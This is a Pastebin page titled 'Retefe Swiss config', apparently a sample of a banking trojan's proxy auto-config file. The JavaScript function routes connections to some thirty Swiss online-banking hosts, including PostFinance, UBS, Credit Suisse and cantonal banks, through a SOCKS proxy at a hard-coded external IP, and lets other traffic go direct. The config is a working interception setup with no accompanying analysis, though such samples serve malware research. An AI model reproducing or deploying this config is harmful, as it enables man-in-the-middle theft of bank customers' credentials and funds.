Advertisement
Matthewm

Retefe Swiss config

Jun 22nd, 2016
1,319
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.79 KB | None | 0 0
  1. function FindProxyForURL(url, host) {
  2. var proxy = "SOCKS 5.34.183.158:80;";
  3. var hosts = new Array('*.postfinance.ch', 'cs.directnet.com', 'eb.akb.ch', '*.ubs.com', 'tb.raiffeisendirect.ch', '*.bkb.ch', 'inba.lukb.ch', '*.zkb.ch', '*.onba.ch', 'e-banking.gkb.ch', '*.bekb.ch', 'wwwsec.ebanking.zugerkb.ch', 'netbanking.bcge.ch', '*.raiffeisen.ch', '*.credit-suisse.com', '*.static-ubs.com', '*.clientis.ch', 'clientis.ch', '*bcvs.ch', '*.cic.ch', 'cic.ch', '*baloise.ch', 'ukb.ch', '*.ukb.ch', 'urkb.ch', '*.urkb.ch', '*.eek.ch', '*szkb.ch', '*shkb.ch', '*glkb.ch', '*nkb.ch', '*owkb.ch', '*cash.ch', '*bcf.ch', 'ebanking.raiffeisen.ch');
  4. for (var i = 0; i < hosts.length; i++) {
  5. if (shExpMatch(host, hosts[i])) {
  6. return proxy
  7. }
  8. }
  9. return "DIRECT"
  10. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement